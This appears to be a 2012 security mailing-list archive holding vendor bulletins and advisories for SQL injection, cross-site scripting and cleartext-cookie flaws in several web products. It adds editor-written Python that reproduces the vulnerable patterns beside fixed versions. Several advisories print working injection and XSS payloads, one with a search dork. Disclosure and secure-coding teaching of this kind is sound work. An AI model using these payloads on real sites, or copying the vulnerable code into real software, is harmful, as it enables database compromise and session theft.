HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2012 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided as is
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)


[security bulletin] HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities

2012-08-14 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03441075

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03441075
Version: 1

HPSBUX02805 SSRT100919 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2012-08-13
Last Updated: 2012-08-13

- -

Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other vulnerabilities.

References: CVE-2012-0508, CVE-2012-0551, CVE-2012-1711, CVE-2012-1713,
CVE-2012-1716, CVE-2012-1718, CVE-2012-1719, CVE-2012-1720, CVE-2012-1721,
CVE-2012-1722, CVE-2012-1723, CVE-2012-1724, CVE-2012-1725, CVE-2012-1726

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE 7.0.02 and 6.0.15

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference  Base Vector Base Score
CVE-2012-0508(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-0551(AV:N/AC:M/Au:N/C:P/I:P/A:N)5.8
CVE-2012-1711(AV:N/AC:L/Au:N/C:P/I:P/A:P)7.5
CVE-2012-1713(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1716(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1718(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2012-1719(AV:N/AC:L/Au:N/C:N/I:P/A:N)5.0
CVE-2012-1720(AV:L/AC:H/Au:N/C:P/I:P/A:P)3.7
CVE-2012-1721(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1722(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1723(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1724(AV:N/AC:L/Au:N/C:N/I:N/A:P)5.0
CVE-2012-1725(AV:N/AC:L/Au:N/C:C/I:C/A:C)   10.0
CVE-2012-1726(AV:N/AC:L/Au:N/C:P/I:P/A:N)6.4
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location

http://www.hp.com/go/java

HP-UX B.11.23, B.11.31 / JDK and JRE v7.0.02 or subsequent

HP-UX B.11.23, B.11.31 / JDK and JRE v6.0.15 or subsequent

HP-UX B.11.11, B.11.23 / JDK and JRE v6.0.15 or subsequent

MANUAL ACTIONS: Yes - Update
For Java v7.0 update to Java v7.0.02 or subsequent
For Java v6.0 update to Java v6.0.15 or subsequent

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

HP-UX B.11.23
HP-UX B.11.31
===
Jdk70.JDK70-COM
Jdk70.JDK70-DEMO
Jdk70.JDK70-IPF32
Jdk70.JDK70-IPF64
Jre70.JRE70-COM
Jre70.JRE70-IPF32
Jre70.JRE70-IPF32-HS
Jre70.JRE70-IPF64
Jre70.JRE70-IPF64-HS
action: install revision 1.7.0.02.00 or subsequent

HP-UX B.11.23
HP-UX B.11.31
===
Jdk60.JDK60-COM
Jdk60.JDK60-DEMO
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.15.00 or subsequent

HP-UX B.11.11
HP-UX B.11.23
===
Jdk60.JDK60-COM
Jdk60.JDK60-DEMO
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
action: install revision 1.6.0.15.00 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 13 August 2012 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to 

Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities

2012-08-14 Thread Vulnerability Lab
Title:
==
Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities


Date:
=
2012-07-13


References:
===
http://www.vulnerability-lab.com/get_content.php?id=659


VL-ID:
=
659


Common Vulnerability Scoring System:

8.3


Introduction:
=
Choosing Flynax General Classifieds software allows you to set up any 
classifieds website. It is not designed for a 
particular niche so it can be adjusted to any idea of a classifieds website. 
This gives you a chance to choose 
any niche for your classifieds website. For example you may create a 
classifieds website which will be based on local 
classifieds with job ads, sport goods, motorbikes, bicycles or be oriented on 
all ideas in one website. Using General 
classifieds software with plugins you may create the classifieds website which 
you desire to have.

(Copy of the Vendor Homepage: 
http://www.flynax.com/general-classifieds-software.html )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in the Flynax General Classifieds v4.0 CMS.


Report-Timeline:

2012-07-13: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

1.1
A SQL injection vulnerability was found in the Flynax General Classifieds 
v4.0 Content Management System. Remote attackers 
without a privileged user account can inject their own SQL commands and 
compromise the application's DBMS. The vulnerability is 
located in the general module, in the sort_by parameter. 
Successful exploitation results in DBMS (server) or web 
application compromise. Exploitation requires no user interaction and no 
privileged user account.

Vulnerable Module(s):
[+] General

Vulnerable Parameter(s):
[+] sort_by


1.2
Multiple persistent input validation vulnerabilities were found in the Flynax 
General Classifieds v4.0 Content Management System.
They allow remote attackers to inject malicious script code that is stored on 
the application side (persistent). The vulnerabilities 
are located in the Administrators, User Account and Categories 
add/list modules, in the Titel and Username
parameters. Successful exploitation can lead to session 
hijacking (manager/admin) or persistent manipulation of the 
affected pages. Exploitation requires low user interaction and a privileged 
user account.

Vulnerable Module(s):
[+] Common > Administrators > Add an Administrator > Listing
[+] User Accounts > Add a User Account > Listing
[+] Categories > Add a Category > Listing

Vulnerable Parameter(s):
[+] Username
[+] Titel


1.3
Multiple non-persistent cross-site scripting vulnerabilities were found in 
the Flynax General Classifieds v4.0 Content Management System.
They allow remote attackers to hijack the sessions of website customers, 
moderators or admins. The bugs are located in the search 
module, in the Titel and Price parameters. 
Successful exploitation can result in account theft, client-side phishing and 
manipulation of client-side content requests. Exploitation requires 
medium or high user interaction (the victim must open a crafted link) and no 
privileged web application user account.

Vulnerable Module(s):
[+] Search

Vulnerable Parameter(s):
[+] Titel
[+] Price


Proof of Concept:
=
1.1
The SQL injection vulnerability can be exploited by remote attackers without 
user interaction and without a privileged user account.
To demonstrate or reproduce:

PoC:
http://general.[SERVER]:1339/general?sort_by=-1 union all select 
1,2,3,4,5,6,7,8,9,@@version,11--



--- Exception Logs ---

MYSQL ERROR
Error:  Unknown column 'T1.' in 'order clause'

Query:  SELECT SQL_CALC_FOUND_ROWS DISTINCT 
SUBSTRING_INDEX(GROUP_CONCAT(DISTINCT `T6`.`Thumbnail` ORDER BY `T6`.`Type` 
DESC, `T6`.`ID` ASC), ',', 1) AS `Main_photo`, `T1`.*, `T1`.`Shows`, 
`T3`.`Path` AS `Path`, `T3`.`Key` AS `Key`, `T3`.`Type` 
AS `Listing_type`, COUNT(`T6`.`Thumbnail`) AS `Photos_count`, 
IF(UNIX_TIMESTAMP(DATE_ADD(`T1`.`Featured_date`, INTERVAL `T2`.`
Listing_period` DAY))  UNIX_TIMESTAMP(NOW()) OR `T2`.`Listing_period` = 0, 
'1', '0') `Featured` FROM `fl_listings` AS `T1` 
LEFT JOIN `fl_listing_plans` AS `T2` ON `T1`.`Plan_ID` = `T2`.`ID` LEFT JOIN 
`fl_categories` AS `T3` ON `T1`.`Category_ID` = 
`T3`.`ID` LEFT JOIN `fl_listing_photos` AS `T6` ON `T1`.`ID` = 
`T6`.`Listing_ID` LEFT JOIN `fl_accounts` AS `T7` ON `T1`.`

Re: How well does Microsoft support (and follow) their mantra keep your PC updated?

2012-08-14 Thread Thomas D.
Hi,

I am not sure if I got your point.

First, winsxs is Microsoft's Windows file repository. Every part of
Windows is split into components and packages. Every package will be
copied into the winsxs folder.

But the content of the winsxs folder doesn't represent the currently
installed features. So for example you could have the IIS package in
winsxs, but IIS isn't currently installed on your system.
But if you would install IIS now, you won't be prompted for a Windows
installation media, because the package is already in the winsxs folder.

Same applies to updates:
If a new version of a package becomes available (Hotfix, Security Update
or just a normal update), Windows will copy the new package into the
winsxs folder, next to the already existing older version of the
package. This will let the winsxs folder grow, but will also make sure
that you are able to remove *every* package at *any* time you want,
because you are able to reinstall the previous version.

I hope this was clear and nothing new for you. So what's your point?
What's wrong when multiple versions of the Visual C++ runtimes are
present in the winsxs folder? Nothing.
It is only important which version is marked as active.

I agree with you:
It is not nice to ship installers with outdated components.
But it wouldn't be better to release an updated installer every 2
months... So if Microsoft (or any other company) ships a new program
today, it should be bundled with the latest version of the component
they are using, because if I haven't installed this component at the
moment, I don't want to be vulnerable *after* I install a new product
(BTW: Did you ever notice the end of the Office installation? Microsoft
is prompting you to visit Windows Update, just because they know that
they will have installed a product/components which are already out of
date).
From my experience, Windows Update is keeping my Windows components
like Visual C++ runtimes up to date:

http://f.666kb.com/i/c6auyx3go8yvhktuo.jpg

So if you noticed an undetected old version, this is a bug and should be
reported to Microsoft. They often re-release Windows Updates because of
wrong/improved detections.

Regarding VC++ 2005 being end of life:
If you are expecting that programs compiled against a specific runtime
version will be recompiled just because the runtime is end of life, you
are wrong and - from my point of view - have not understood how runtimes
are used and why it isn't really a risk.

But as I said in the beginning, maybe I didn't get your point.


-- 
Regards,
Thomas




NeoInvoice Blind SQL Injection (CVE-2012-3477)

2012-08-14 Thread Adam Caudill
NeoInvoice is a multi-tenant open source invoicing system that
currently contains an unauthenticated blind SQL injection condition in
signup_check.php. The input for the value field isn't properly
sanitized, and is used in string concatenation to build the SQL
query.

See here for the offending code:

https://github.com/tlhunter/neoinvoice/blob/5e7af94641cba17df9141e95108c369cfb6e6dd5/public/signup_check.php#L29

Proof of concept:

signup_check.php?field=username&value='+OR+SLEEP(5)+OR+'

I've alerted the author but haven't heard back.

More Info: 
http://adamcaudill.com/2012/08/12/neoinvoice-blind-sql-injection-cve-2012-3477/
Project: https://github.com/tlhunter/neoinvoice

--Adam Caudill
http://adamcaudill.com
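The two injection shapes reported above, an attacker-chosen ORDER BY term (the Flynax sort_by parameter) and a string value concatenated into a WHERE clause (the NeoInvoice value parameter), reproduced as an added example against constructed SQLite tables, each beside a hardened version. This is editor-written code, not code from Flynax, NeoInvoice or either advisory; the table and column names are assumptions, not the products' real schema.

```python
# Added example, not code from Flynax, NeoInvoice or their advisories.
# Constructed data in SQLite; table/column names are assumptions.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for a classifieds/invoicing DB."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE listings (id INTEGER PRIMARY KEY, title TEXT, price REAL);
        INSERT INTO listings (title, price)
            VALUES ('bike', 120.0), ('tent', 80.5), ('kayak', 450.0);
        CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT UNIQUE);
        INSERT INTO accounts (username) VALUES ('alice'), ('bob');
        """
    )
    return conn


# ---- the vulnerable shapes -------------------------------------------------

def listing_titles_vulnerable(conn, sort_by: str) -> list:
    # The sort key is pasted into the SQL text. ORDER BY cannot be bound as a
    # parameter, so whatever expression the attacker sends is evaluated by the
    # DBMS; the resulting row order then leaks the value of that expression
    # (boolean-based inference), and a malformed term produces the kind of
    # error shown in the Flynax exception log.
    sql = "SELECT title FROM listings ORDER BY " + sort_by
    return [row[0] for row in conn.execute(sql)]


def username_taken_vulnerable(conn, value: str) -> bool:
    # The value is concatenated into the WHERE clause, as in signup_check.php.
    sql = "SELECT COUNT(*) FROM accounts WHERE username = '" + value + "'"
    return conn.execute(sql).fetchone()[0] > 0


# ---- hardened versions -----------------------------------------------------

# Allow-list: the user picks a key, the application supplies the SQL fragment.
SORT_TERMS = {"title": "title ASC", "price": "price ASC", "newest": "id DESC"}


def listing_titles(conn, sort_by: str) -> list:
    try:
        order = SORT_TERMS[sort_by]
    except KeyError:
        raise ValueError("unsupported sort key: %r" % sort_by) from None
    sql = "SELECT title FROM listings ORDER BY " + order
    return [row[0] for row in conn.execute(sql)]


def username_taken(conn, value: str) -> bool:
    # Bound parameter: the value is data and cannot change the query's structure.
    sql = "SELECT COUNT(*) FROM accounts WHERE username = ?"
    return conn.execute(sql, (value,)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    # NeoInvoice-style payload: an always-true condition makes the check "match".
    payload = "' OR 1=1 OR '"
    print("vulnerable:", username_taken_vulnerable(db, payload))  # True
    print("hardened:  ", username_taken(db, payload))             # False
    # Flynax-style payload: infer a fact about another table from the row order.
    probe = "CASE WHEN (SELECT COUNT(*) FROM accounts) = 2 THEN price ELSE title END"
    print("vulnerable order:", listing_titles_vulnerable(db, probe))
    try:
        listing_titles(db, probe)
    except ValueError as exc:
        print("hardened:", exc)
```

The ORDER BY case is the one that trips people up: there is no placeholder for a column name, so the only fix is to map the user's choice onto a fixed dictionary of SQL fragments and reject everything else. The WHERE case is the ordinary parameterised query, which removes the injection regardless of how the value is quoted.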


7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities

2012-08-14 Thread Vulnerability Lab
Title:
==
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities 


Date:
=
2012-08-12


References:
===
http://www.vulnerability-lab.com/get_content.php?id=679


VL-ID:
=
680


Common Vulnerability Scoring System:

8.3


Abstract:
=
The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered 
multiple SQL Injection Vulnerabilities in the 7sepehr CMS.


Report-Timeline:

Vulnerability Laboratory [Research Team]  - Ibrahim El-Sayed [storm] 
(st...@vulnerability-lab.com)


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Critical


Details:

Multiple SQL injection vulnerabilities were found in the official 7sepehr.com 
Content Management System 2012. 
Remote attackers can inject their own SQL commands and compromise the affected 
application's DBMS. The vulnerabilities 
are located in the news_detail, news_view and content ASP modules, in the 
id parameter. 
Successful exploitation of the remote SQL injection vulnerabilities results in 
DBMS or web application compromise. 


Vulnerable File(s):
[+] news_Detail.asp
[+] newsview.asp
[+] contents.aspx

Vulnerable Parameter(s):
[+] id



Proof of Concept:
=
The remote SQL injection vulnerabilities can be exploited by remote attackers 
without a privileged user account and 
without user interaction. To demonstrate or reproduce:

Dork:  `Powered by 7sepehr.com`

PoC:
http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL 
INJECTION VULNERABILITY]--  
http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION 
VULNERABILITY]--  
http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION 
VULNERABILITY]--


Risk:
=
The security risk of the remote SQL injection vulnerabilities is estimated as 
critical.


Credits:

Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor 
licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:www.vulnerability-lab.com   - www.vuln-lab.com  
   - www.vulnerability-lab.com/register
Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com 
   - resea...@vulnerability-lab.com
Section:video.vulnerability-lab.com - forum.vulnerability-lab.com   
   - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab 
   - youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php   - 
vulnerability-lab.com/rss/rss_upcoming.php   - 
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file 
requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is 
granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All 
pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the 
specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (ad...@vulnerability-lab.com or 
supp...@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability 
Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: resea...@vulnerability-lab.com




Total Shop UK eCommerce Generic Cross-Site Scripting

2012-08-14 Thread research
/--\
| Total Shop UK eCommerce Generic Cross-Site Scripting |
\--/


Summary
===

The open source version of Total Shop UK eCommerce based on CodeIgniter
version 2.1.2 is subject to a cross-site scripting vulnerability. The value
of a generic parameter was not sufficiently sanitised before being written
to a block of Javascript code. An attacker could distribute a malicious URL
that would trigger this vulnerability and potentially steal session cookies,
redirect the user to a malicious URL or download malware onto their machine.

CVE number: CVE-2012-4236
Impact: Medium
Vendor homepage: http://www.totalshopuk.com/
Vendor notified: 06/08/2012
Credit: Chris Cooper of Reaction Information Security
(http://www.reactionis.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html


Affected Products
 

Total Shop UK eCommerce based on CodeIgniter version 2.1.2 (open source
version). Other versions may be affected.


Details
===

Generic parameters in the /application/modules/_main/views/_top.php file are
written to a Javascript function in the page header without sanitisation.
The entire URL, including the query string, is written (via a PHP echo
construct) into a refresh_page() Javascript function. It was possible to
escape the function and execute arbitrary Javascript code on the application
pages. 

There is some character filtering in place, although this can be evaded by
inserting a null (%00) character (see proof of concept).


Impact
==

An attacker might entice users to follow a malicious URL, causing Javascript
code to execute in their browser, potentially stealing session cookies,
redirecting the user to a malicious URL or downloading malware onto their
machine.


Proof of Concept
===

Injecting the following Javascript code into a generic parameter on any
application page will trigger the vulnerability, causing the page to return
a Javascript alert box.

%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//

---
Example 1 Request:
+-

GET /?%00;};alert(String.fromCharCode(120,115,115,116,101,115,116));{//=1
HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/about


---
Example 1 Response:
+--

--- SNIP ---
function refresh_page(){
 
parent.location=/?%00;};alert(String.fromCharCode(120,115,115,116,101,115,
116));{//=1; 
}
--- SNIP ---


Solution


Upgrade to Total Shop UK eCommerce 2.1.2_p1. Download link here:
http://sourceforge.net/projects/totalshopuk/files/TSUK_eCommerce_v2.1.2_p1.zip/download


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:


http://www.reactionpenetrationtesting.co.uk/totalshop-uk-generic-xss.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk



TCExam Edit Cross-Site Scripting

2012-08-14 Thread research
/--\
| TCExam Edit Cross-Site Scripting |
\--/


Summary
===

TCExam 11.3.007 is subject to a cross-site scripting vulnerability. A
'question_subject_id' parameter is not sufficiently sanitised before being
written to the tce_edit_answer.php page. An attacker could distribute a
malicious URL to specific users as part of a spear-phishing campaign. Users
following the link would trigger this vulnerability which could potentially
steal session cookies, redirect the user to a malicious URL or download
malware onto their machine.

CVE number: CVE-2012-4238
Impact: Medium
Vendor homepage: http://www.tcexam.org/
Vendor notified: 06/08/2012
Vendor fixed: 06/08/2012
Credit: Chris Cooper of Reaction Information Security
(http://www.reactionis.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html


Affected Products
 

Confirmed in TCExam 11.3.007. Prior versions may also be affected.


Details
===

The question_subject_id parameter on the tce_edit_answer.php page was found
to be subject to a cross-site scripting vulnerability. It was possible to
inject arbitrary Javascript code into the parameter which is passed into the
page content without sanitisation. 

The fact that the user must be authenticated as well as an administrator
(permission level 5 or above) reduces the likelihood of a successful attack.
However, the vulnerability could potentially be leveraged in a spear
phishing attack, targeted at exam authors and administrators, to hijack
their sessions.


Impact
==

An attacker might entice users to follow a malicious URL, causing Javascript
code to execute in their browser, potentially stealing session cookies,
redirecting the user to a malicious URL or downloading malware onto their
machine.


Proof of Concept
===

Injecting the following script into the question_subject_id parameter of the
tce_edit_answer.php page will trigger the vulnerability, causing the page to
return a Javascript alert box.

<script>alert(String.fromCharCode(120,115,115,116,101,115,116))</script>

---
Example 1 Request:
+-

GET
/TCExam/admin/code/tce_edit_answer.php?subject_module_id=2question_subject_
id=1scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/scrip
tanswer_question_id=7 HTTP/1.1
Host: 192.168.0.6
Referer: http://192.168.0.6/TCExam/admin/code/tce_edit_question.php
Cookie: PHPSESSID=db1fe2b665994ff76356e7a28abfa5df

---
Example 1 Response:
+--

--- SNIP ---
a
href=tce_edit_question.php?subject_module_id=2amp;question_subject_id=1\
scriptalert(String.fromCharCode(120,115,115,116,101,115,116))/scriptamp
;question_id=7 title=Question Management class=xmlbuttonlt; Question
Management/a/span
--- SNIP ---


Solution


Upgrade to TCExam 11.3.008.


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk 

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:



http://www.reactionpenetrationtesting.co.uk/tcexam-cross-site-scripting.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
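Both Reaction advisories above come down to the same defect in two different output contexts: Total Shop UK writes the raw request URL into a JavaScript string literal inside refresh_page(), and TCExam writes the question_subject_id parameter into an href attribute. The following is an added example by the editor, not code from either product, showing the vulnerable pattern next to context-specific encoding for each sink. The page fragments are constructed stand-ins for the real templates, and the payloads are constructed too (the advisory's own %00 filter bypass is not reproduced, since the filter it evades is not described).

```python
# Added example, not code from Total Shop UK or TCExam. The HTML/JS
# fragments are constructed stand-ins for the products' templates.
import html
import json


def js_string_literal(value: str) -> str:
    """Encode `value` as a JavaScript string literal that is also safe inside <script>.

    json.dumps yields a double-quoted literal with quotes, backslashes and every
    control character (NUL included) escaped; ensure_ascii additionally escapes
    U+2028/U+2029, which are line terminators in JavaScript. The characters that
    matter to the HTML parser are escaped as well, because a '</script>' inside
    the literal would end the script block before the JS engine ever runs.
    """
    lit = json.dumps(value, ensure_ascii=True)
    return (lit.replace("&", "\\u0026")
               .replace("<", "\\u003c")
               .replace(">", "\\u003e")
               .replace("/", "\\/"))


def js_literal_roundtrips(value: str) -> bool:
    """Check: the encoded literal decodes back to exactly the input."""
    return json.loads(js_string_literal(value)) == value


def refresh_page_script_vulnerable(request_uri: str) -> str:
    # The Total Shop pattern: the raw URL is echoed straight into the function.
    return 'function refresh_page(){\n  parent.location="%s";\n}' % request_uri


def refresh_page_script(request_uri: str) -> str:
    return "function refresh_page(){\n  parent.location=%s;\n}" % js_string_literal(request_uri)


def unescaped_double_quotes(script: str) -> int:
    """Count '"' characters not preceded by a backslash. A single intact
    string literal contributes exactly two; a third one means the literal was
    closed early and whatever follows is executed as code."""
    count, i = 0, 0
    while i < len(script):
        if script[i] == "\\":
            i += 2
            continue
        if script[i] == '"':
            count += 1
        i += 1
    return count


def edit_link_vulnerable(question_subject_id: str) -> str:
    # The TCExam pattern: parameter reflected into an attribute unencoded.
    return ('<a href="tce_edit_question.php?question_subject_id=%s">'
            'Question Management</a>' % question_subject_id)


def edit_link(question_subject_id: str) -> str:
    # Validate the type first (an id is an integer), then entity-encode for the
    # attribute context anyway so the value cannot leave the quoted attribute.
    if not question_subject_id.isdigit():
        raise ValueError("question_subject_id must be numeric")
    return ('<a href="tce_edit_question.php?question_subject_id=%s">'
            'Question Management</a>' % html.escape(question_subject_id, quote=True))


if __name__ == "__main__":
    # Constructed payload in the spirit of the advisory's ';};alert(...);{//'
    uri = '/?";};alert(1);{//=1'
    print(refresh_page_script_vulnerable(uri))  # literal closed early, alert() is top-level code
    print(refresh_page_script(uri))             # one intact string literal
    print(edit_link_vulnerable("1<script>alert(1)</script>"))
    try:
        edit_link("1<script>alert(1)</script>")
    except ValueError as exc:
        print("rejected:", exc)
```

The point of unescaped_double_quotes() is to make the breakout measurable rather than eyeballed: the vulnerable render contains three unescaped quotes, the encoded one exactly two. For the attribute sink, validation (a numeric id) is the primary control and the entity encoding is defence in depth for the cases where the value is legitimately free text.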



Group-Office Cleartext Credentials Stored in Cookies

2012-08-14 Thread research
/--\
| Group-Office Cleartext Credentials Stored in Cookies |
\--/


Summary
===

Group-Office 4.0.71 was found to display a behaviour that could potentially
expose a user's username and cleartext password to third-parties. Under
certain circumstances the application would return two cookies, one
containing the user's username and the other their cleartext password. These
cookies would then be returned to the server with each request to the
application.

CVE number: CVE-2012-4239
Impact: Medium
Vendor homepage: http://www.group-office.com/
Vendor notified: 19/07/2012
Vendor fixed: 25/07/2012
Credit: Chris Cooper and Joseph Sheridan of Reaction Information Security
(http://www.reactionpenetrationtesting.co.uk/)

This advisory is posted at:

http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html


Affected Products
 

Confirmed in Group-Office community 4.0.71. Other versions may also be
affected.


Details
===

When logging into the application, if a user ticks the 'Remember my login on
this computer until I press logout' box, and then successfully logs into the
application, two cookies ('GO_UN' and 'GO_PW') are returned. These cookies
contain the user's username and cleartext password respectively.

The cookies are set with the 'HttpOnly' flag which would significantly
reduce the chances of their disclosure during a cross-site scripting attack.
However, the application does not enforce a secure channel by default, and
the offending cookies are not set with the 'Secure' flag.


Impact
==

Once these cookies are stored, the user's username and password could be
transferred over an insecure HTTP connection, increasing the likelihood that
an attacker might be able to intercept the credentials and access the
application.

Furthermore, the cleartext credentials will be stored on the computer which
makes them more easily accessible to an attacker with access to the machine.
This significantly lowers the difficulty of exploitation.


Solution


Upgrade to Group-Office community 4.0.73.


Distribution


In addition to posting on the website, a text version of this notice has
been posted to the following e-mail and Usenet news recipients.

* bugtraq () securityfocus com
* full-disclosure () lists grok org uk

Future updates of this advisory, if any, will be placed on the ReactionIS
corporate website, but may or may not be actively announced on mailing lists
or newsgroups. Users concerned about this problem are encouraged to check
the URL below for any updates:



http://www.reactionpenetrationtesting.co.uk/group-office-cookies.html


==

Reaction Information Security 
Lombard House Business Centre,
Suite 117,
12-17 Upper Bridge Street,
Canterbury, Kent, CT1 2NF

Phone: +44 (0)1227 785050
Email: research () reactionis {dot} co {dot} uk
Web: http://www.reactionpenetrationtesting.co.uk
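The usual alternative to what the Group-Office advisory describes is a "remember me" cookie that carries a random, single-purpose token instead of the username and password, is kept server-side only as a hash, and is set with the Secure and HttpOnly flags. The following is an added example written by the editor, not Group-Office code; the cookie name GO_REMEMBER and the in-memory token store are assumptions, and the lifetime is an arbitrary 14 days.

```python
# Added example, not Group-Office code. Cookie name GO_REMEMBER, the
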